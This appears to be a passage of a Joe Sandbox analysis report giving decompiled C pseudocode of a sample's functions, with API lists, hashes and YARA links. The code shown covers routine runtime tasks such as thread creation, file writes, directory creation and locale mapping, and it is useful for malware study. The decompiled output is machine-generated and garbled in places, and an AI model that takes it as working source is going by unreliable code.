				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t70 = E003F8E06(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E003FBBF0(_t68, _t70, __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E003F8B6F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x40ec70;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x40ec70) {
								E003F8DCC( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x40eef0 & 0x00000001;
							if(( *0x40eef0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E003FB691(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x40ee90; // 0x2b62370
									 *0x40e964 = _t44;
								}
							}
						}
						L6:
						E003F8DCC(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E003F91A8())) = 0x16;
						goto L5;
					}
				}
			}
















                0x003fba27
                0x003fba27
                0x003fba34
                0x003fba37
                0x003fba3f
                0x003fba48
                0x003fba4b
                0x003fba51
                0x00000000
                0x003fba53
                0x003fba57
                0x003fba58
                0x003fba59
                0x003fba64
                0x003fba66
                0x003fba6a
                0x003fba6c
                0x003fba9c
                0x003fba9c
                0x00000000
                0x003fba6e
                0x003fba7b
                0x003fba81
                0x003fba84
                0x003fba89
                0x003fba8d
                0x003fba8f
                0x003fbaae
                0x003fbab2
                0x003fbab4
                0x003fbab4
                0x003fbabf
                0x003fbac3
                0x003fbac4
                0x003fbac6
                0x003fbac9
                0x003fbad0
                0x003fbad5
                0x003fbada
                0x003fbad0
                0x003fbadb
                0x003fbae1
                0x003fbae6
                0x003fbae8
                0x003fbaeb
                0x003fbaee
                0x003fbaf5
                0x003fbaf7
                0x003fbafe
                0x003fbb03
                0x003fbb0c
                0x003fbb11
                0x003fbb17
                0x003fbb19
                0x003fbb1e
                0x003fbb1e
                0x003fbb17
                0x003fbafe
                0x003fba9e
                0x003fba9f
                0x00000000
                0x003fba91
                0x003fba96
                0x00000000
                0x003fba96
                0x003fba8f

                APIs
                  • Part of subcall function 003F97E5: GetLastError.KERNEL32(?,00411098,003F4674,00411098,?,?,003F40EF,?,?,00411098), ref: 003F97E9
                  • Part of subcall function 003F97E5: _free.LIBCMT ref: 003F981C
                  • Part of subcall function 003F97E5: SetLastError.KERNEL32(00000000,?,00411098), ref: 003F985D
                  • Part of subcall function 003F97E5: _abort.LIBCMT ref: 003F9863
                  • Part of subcall function 003FBB4E: _abort.LIBCMT ref: 003FBB80
                  • Part of subcall function 003FBB4E: _free.LIBCMT ref: 003FBBB4
                  • Part of subcall function 003FB7BB: GetOEMCP.KERNEL32(00000000,?,?,003FBA44,?), ref: 003FB7E6
                • _free.LIBCMT ref: 003FBA9F
                • _free.LIBCMT ref: 003FBAD5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID: p@
                • API String ID: 2991157371-1482256116
                • Opcode ID: 67ce10eac41ac30c250a6b0183a255ce6eaa5c758d15a499daa0ddbc274821a6
                • Instruction ID: 6c54660a814e34b310d6bd3d15d4f929acf9f48b53a608e8bcc5a052dad6abb0
                • Opcode Fuzzy Hash: 67ce10eac41ac30c250a6b0183a255ce6eaa5c758d15a499daa0ddbc274821a6
                • Instruction Fuzzy Hash: AD31937190420DAFDF16EFA9D441BB9F7F5EF41320F254099E6049B2A2EB329D40DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E003E101F() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x411098 > 0) {
					_t18 = 0x41109c;
					do {
						_t7 = CreateThread(0, 0x10000, E003E1160, 0x411098, 0,  &_v4); // executed
						_t22 = _t7;
						_t25 = _t22;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x411098);
							E003D6C36(0x411098);
							E003D6C31(E003D6DCB(0x411098, _t25), 0x411098, 0x411098, 2);
						}
						 *_t18 = _t22;
						 *0x0041119C =  *((intOrPtr*)(0x41119c)) + 1;
						_t8 =  *0x4181e0; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x411098);
					return _t8;
				}
				return _t5;
			}













                0x003e1024
                0x003e1028
                0x003e102c
                0x003e102f
                0x003e1043
                0x003e1049
                0x003e104b
                0x003e104d
                0x003e104f
                0x003e1054
                0x003e1059
                0x003e1071
                0x003e1071
                0x003e1076
                0x003e1078
                0x003e107e
                0x003e1085
                0x003e108a
                0x003e108a
                0x003e1090
                0x003e1091
                0x003e1094
                0x00000000
                0x003e1099
                0x003e109d

                APIs
                • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 003E1043
                • SetThreadPriority.KERNEL32(?,00000000), ref: 003E108A
                  • Part of subcall function 003D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D6C54
                  • Part of subcall function 003D6DCB: _wcschr.LIBVCRUNTIME ref: 003D6E0A
                  • Part of subcall function 003D6DCB: _wcschr.LIBVCRUNTIME ref: 003D6E19
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2706921342-3849766595
                • Opcode ID: b1bde1085845b8b5437c4c9e13d87ae2c3ad292bcaacbbca399194f0f4bcabf1
                • Instruction ID: daa00c995c72a1d86f507b2f3f940fcb65f4ffcd53d2c9a82fbe1708709a4674
                • Opcode Fuzzy Hash: b1bde1085845b8b5437c4c9e13d87ae2c3ad292bcaacbbca399194f0f4bcabf1
                • Instruction Fuzzy Hash: 4F012BB6340349ABD3315F25AC52BB67758EB84751F20012FF746562C0CAB06C848228
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE528() {

				E003EE85D(0x40c66c, 0x433084); // executed
				goto __eax;
			}



                0x003ee51f
                0x003ee526

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: (>$2>
                • API String ID: 1269201914-613093996
                • Opcode ID: 5f6a1784af021f410e84154a2c3123251eb9bdba7eaaa9afeb50b09a3e45285f
                • Instruction ID: 16498d57af3990d6762f7f07ad20e9a9375c1d1558644f362c86e96dfa08e66b
                • Opcode Fuzzy Hash: 5f6a1784af021f410e84154a2c3123251eb9bdba7eaaa9afeb50b09a3e45285f
                • Instruction Fuzzy Hash: EEB012C52584D0BC7109521A1D02D3B051CC0C6F11730D73FF414C84C0E9454C450435
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E003D9F7A() {
				void* __ecx;
				void* __ebp;
				long _t37;
				void* _t42;
				void* _t46;
				signed int _t49;
				intOrPtr* _t53;
				void** _t54;
				DWORD* _t61;
				void* _t65;
				intOrPtr _t66;
				long _t67;
				intOrPtr* _t69;
				void* _t70;

				_t67 =  *(_t70 + 0x18);
				_t69 = _t53;
				if(_t67 != 0) {
					_t54 = _t69 + 8;
					 *(_t70 + 0xc) = _t54;
					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
						 *(_t70 + 0xc) = _t54;
					} else {
						_t46 = GetStdHandle(0xfffffff5);
						_t54 = _t69 + 8;
						 *_t54 = _t46;
					}
					while(1) {
						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
						_t49 = 0;
						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
							goto L13;
						}
						_t65 = 0;
						if(_t67 == 0) {
							L15:
							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
								L22:
								 *((char*)(_t69 + 0xc)) = 1;
								return _t49;
							} else {
								_t64 = _t69 + 0x32;
								if(E003D6BAA(0x411098, _t69 + 0x32, 0) == 0) {
									E003D6E98(0x411098, _t69, 0, _t64);
									goto L22;
								}
								_t54 =  *(_t70 + 0x14);
								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
									_t66 =  *_t69;
									 *0x403278(0);
									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
									asm("sbb edx, 0x0");
									 *0x403278(_t42 -  *(_t70 + 0x14), _t61);
									 *((intOrPtr*)(_t66 + 0x10))();
									_t67 =  *(_t70 + 0x20);
									_t54 =  *(_t70 + 0x14);
								}
								continue;
							}
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t37 = _t67 - _t65;
							if(_t37 >= 0x4000) {
								_t37 = 0x4000;
							}
							_t61 = _t70 + 0x14;
							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
							_t49 = _t49 & 0xffffff00 | _t13;
							if(_t13 != 0) {
								break;
							}
							_t54 =  *(_t70 + 0x14);
							_t65 = _t65 + 0x4000;
							if(_t65 < _t67) {
								continue;
							}
							break;
						}
						L14:
						if(_t49 != 0) {
							goto L22;
						}
						goto L15;
						L13:
						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
						asm("sbb bl, bl");
						_t49 = 1;
						goto L14;
					}
				}
				return 1;
			}

















                0x003d9f7e
                0x003d9f82
                0x003d9f86
                0x003d9f93
                0x003d9f96
                0x003d9f9a
                0x003d9fab
                0x003d9f9c
                0x003d9f9e
                0x003d9fa4
                0x003d9fa7
                0x003d9fa7
                0x003d9fb1
                0x003d9fb1
                0x003d9fb6
                0x003d9fbc
                0x00000000
                0x00000000
                0x003d9fbe
                0x003d9fc2
                0x003da024
                0x003da028
                0x003da0a2
                0x003da0a5
                0x00000000
                0x003da030
                0x003da032
                0x003da042
                0x003da09d
                0x00000000
                0x003da09d
                0x003da044
                0x003da04c
                0x003da05d
                0x003da067
                0x003da06f
                0x003da078
                0x003da07d
                0x003da085
                0x003da088
                0x003da08c
                0x003da08c
                0x00000000
                0x003da04c
                0x00000000
                0x00000000
                0x00000000
                0x003d9fc4
                0x003d9fc4
                0x003d9fc6
                0x003d9fcd
                0x003d9fcf
                0x003d9fcf
                0x003d9fd6
                0x003d9fee
                0x003d9fee
                0x003d9ff1
                0x00000000
                0x00000000
                0x003d9ff3
                0x003d9ff7
                0x003d9fff
                0x00000000
                0x00000000
                0x00000000
                0x003da001
                0x003da020
                0x003da022
                0x00000000
                0x00000000
                0x00000000
                0x003da003
                0x003da011
                0x003da01c
                0x003da01e
                0x00000000
                0x003da01e
                0x003d9fb1
                0x00000000

                APIs
                • GetStdHandle.KERNEL32(000000F5,?,?,?,?,003DD343,00000001,?,?,?,00000000,003E551D,?,?,?), ref: 003D9F9E
                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,003E551D,?,?,?,?,?,003E4FC7,?), ref: 003D9FE5
                • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,003DD343,00000001,?,?), ref: 003DA011
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: b19bc1927b7bc85cfeadf132d5774ead1a2518f2c3d5eea309c3b0f1038d4698
                • Instruction ID: b6c7ce43a67863fc24b4584f9ccfa11a49f22fefa5ad8aff520b394e28235054
                • Opcode Fuzzy Hash: b19bc1927b7bc85cfeadf132d5774ead1a2518f2c3d5eea309c3b0f1038d4698
                • Instruction Fuzzy Hash: 98318072244305AFDB16CF20E918B6A7BA9FB84716F04451EF581AB390C7759D48CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DA2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t11;
				void* _t14;
				void* _t17;
				int _t24;
				long _t25;
				WCHAR* _t26;
				void* _t27;

				_t27 = __eflags;
				E003EEC50(0x1000);
				_t26 = _a4;
				_t11 =  *(E003DC27E(_t27, _t26)) & 0x0000ffff;
				if(_t11 != 0x2e && _t11 != 0x20) {
					_t24 = CreateDirectoryW(_t26, 0); // executed
					if(_t24 != 0) {
						L6:
						if(_a8 != 0) {
							E003DA4ED(_t26, _a12); // executed
						}
						return 0;
					}
				}
				if(E003DA231(_t26) == 0 && E003DBB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
					goto L6;
				}
				_t25 = GetLastError();
				_t14 = 2;
				__eflags = _t25 - _t14;
				if(_t25 != _t14) {
					__eflags = _t25 - 3;
					_t17 = (0 | _t25 == 0x00000003) + 1;
					__eflags = _t17;
					return _t17;
				}
				return _t14;
			}











                0x003da2b2
                0x003da2ba
                0x003da2c0
                0x003da2c9
                0x003da2cf
                0x003da2d9
                0x003da2e1
                0x003da316
                0x003da31a
                0x003da320
                0x003da320
                0x00000000
                0x003da325
                0x003da2e1
                0x003da2eb
                0x00000000
                0x00000000
                0x003da32f
                0x003da333
                0x003da334
                0x003da336
                0x003da33a
                0x003da340
                0x003da340
                0x00000000
                0x003da340
                0x003da343

                APIs
                  • Part of subcall function 003DC27E: _wcslen.LIBCMT ref: 003DC284
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA2D9
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA30C
                • GetLastError.KERNEL32(?,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA329
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast_wcslen
                • String ID:
                • API String ID: 2260680371-0
                • Opcode ID: af86adb9bfeedb4ba0708669bce5dba7d17a71f3aefff89ca7460192eed913be
                • Instruction ID: 4f5d5d7132205b8bf8dc96a06e968d89f4d2d758c7912be797702652dc084a5d
                • Opcode Fuzzy Hash: af86adb9bfeedb4ba0708669bce5dba7d17a71f3aefff89ca7460192eed913be
                • Instruction Fuzzy Hash: F501B537500A106AEF23AF756E09BED365D9F0A781F044417F901E62C5D764CB81C6B6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E003FB893(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t87;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				char* _t94;
				intOrPtr _t96;
				signed int _t97;

				_t63 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t63 ^ _t97;
				_t96 = _a4;
				_t4 = _t96 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t96 + 0x119; // 0x3fbee6
					_t93 = _t47;
					_t87 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t93;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t94 = _t93 + _t87;
						_t69 = _t68 + _t94;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t94 = 0;
							} else {
								_t72 = _t96 + _t87;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t87 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
							_t54 = _t87 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t94 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t96 + 0x119; // 0x3fbee6
						_t93 = _t61;
						_t87 = _t87 + 1;
						__eflags = _t87 - 0x100;
					} while (_t87 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t90 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t103 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t90 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t90 = _t90 + 2;
						__eflags = _t90;
						_t75 =  *_t90;
					}
					_t13 = _t96 + 4; // 0x5efc4d8b
					E003FC988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t96 + 4; // 0x5efc4d8b
					_t19 = _t96 + 0x21c; // 0xdb855708
					E003FAB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t96 + 4; // 0x5efc4d8b
					_t23 = _t96 + 0x21c; // 0xdb855708
					E003FAB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t91 = 0;
					do {
						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t96 + _t91 + 0x119) = 0;
							} else {
								_t37 = _t96 + _t91 + 0x19;
								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
								goto L15;
							}
						} else {
							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
							L15:
							 *(_t96 + _t91 + 0x119) = _t68;
						}
						_t91 = _t91 + 1;
					} while (_t91 < 0x100);
				}
				return E003EFBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
			}































                0x003fb89e
                0x003fb8a5
                0x003fb8aa
                0x003fb8b5
                0x003fb8c7
                0x003fb9bf
                0x003fb9bf
                0x003fb9c5
                0x003fb9c7
                0x003fb9c8
                0x003fb9c8
                0x003fb9ca
                0x003fb9d0
                0x003fb9d0
                0x003fb9d2
                0x003fb9d4
                0x003fb9dd
                0x003fb9e0
                0x003fb9ec
                0x003fb9f3
                0x003fba03
                0x003fb9f5
                0x003fb9f5
                0x003fb9f8
                0x003fb9f8
                0x003fb9f8
                0x003fb9fc
                0x003fb9fc
                0x00000000
                0x003fb9fc
                0x003fb9e2
                0x003fb9e2
                0x003fb9e7
                0x003fb9e7
                0x003fb9ff
                0x003fb9ff
                0x003fb9ff
                0x003fba05
                0x003fba0b
                0x003fba0b
                0x003fba11
                0x003fba12
                0x003fba12
                0x003fb8cd
                0x003fb8cd
                0x003fb8cf
                0x003fb8cf
                0x003fb8d6
                0x003fb8d7
                0x003fb8db
                0x003fb8e1
                0x003fb8e7
                0x003fb90f
                0x003fb90f
                0x003fb911
                0x00000000
                0x00000000
                0x003fb8f0
                0x003fb8f4
                0x003fb906
                0x003fb906
                0x003fb908
                0x00000000
                0x00000000
                0x003fb8f9
                0x003fb8fb
                0x003fb8fd
                0x003fb905
                0x003fb905
                0x00000000
                0x003fb905
                0x00000000
                0x003fb8fb
                0x003fb90a
                0x003fb90a
                0x003fb90d
                0x003fb90d
                0x003fb914
                0x003fb929
                0x003fb92f
                0x003fb943
                0x003fb94a
                0x003fb959
                0x003fb96b
                0x003fb972
                0x003fb97a
                0x003fb97c
                0x003fb97c
                0x003fb986
                0x003fb996
                0x003fb998
                0x003fb9af
                0x003fb99a
                0x003fb99a
                0x003fb99a
                0x003fb99a
                0x003fb99f
                0x00000000
                0x003fb99f
                0x003fb988
                0x003fb988
                0x003fb98d
                0x003fb9a6
                0x003fb9a6
                0x003fb9a6
                0x003fb9b6
                0x003fb9b7
                0x003fb9bb
                0x003fba26

                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 003FB8B8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 7ac2b4826e32fde9df46f3e28a3dd78172fb583954a8e9a2ac0027aa4898b9be
                • Instruction ID: 37c1da35b3877d8c5e05a96e81e43ce84f239086b31d65414b03b0b92805d14f
                • Opcode Fuzzy Hash: 7ac2b4826e32fde9df46f3e28a3dd78172fb583954a8e9a2ac0027aa4898b9be
                • Instruction Fuzzy Hash: C741D5B050428C9EDF238E69CC84BF6FBADEB55304F1404EDE79AC6142D375AA459F60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 35%
                			E003FAF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				void* _t30;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t26 = __ecx;
				_t25 = __ebx;
				_push(__ecx);
				_t18 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t18 ^ _t35;
				_t20 = E003FAC98(0x16, "LCMapStringEx", 0x4079c4, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					_t22 = LCMapStringW(E003FAFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x403278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t33();
				}
				_pop(_t34);
				return E003EFBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
			}












                0x003faf6c
                0x003faf6c
                0x003faf6c
                0x003faf71
                0x003faf72
                0x003faf79
                0x003faf8e
                0x003faf93
                0x003faf9a
                0x003fafdd
                0x003faf9c
                0x003fafb9
                0x003fafbf
                0x003fafbf
                0x003fafe8
                0x003faff1

                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 003FAFDD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
